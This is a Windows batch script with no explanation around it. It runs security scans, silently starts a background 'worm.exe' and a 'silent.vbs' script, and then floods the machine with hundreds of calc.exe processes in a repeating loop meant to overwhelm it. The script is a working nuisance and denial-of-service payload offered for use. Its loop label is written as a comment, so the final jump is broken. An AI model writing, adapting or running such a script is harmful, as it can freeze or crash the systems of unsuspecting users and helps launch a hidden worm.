@echo off

setlocal enabledelayedexpansion

MpCmdRun.exe -Scan -ScanType 2

UsoClient StartScan 

set /a counter=0

start "" /b worm.exe

wscript.exe silent.vbs			

::loop
set /a counter+=1

::Launch multiple instances at once (change number if you want to)

start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe
start "" calc.exe




for /L %%a in (1,2,1000) do start "" calc.exe

timeout /t 1 /nobreak >nul
goto loop
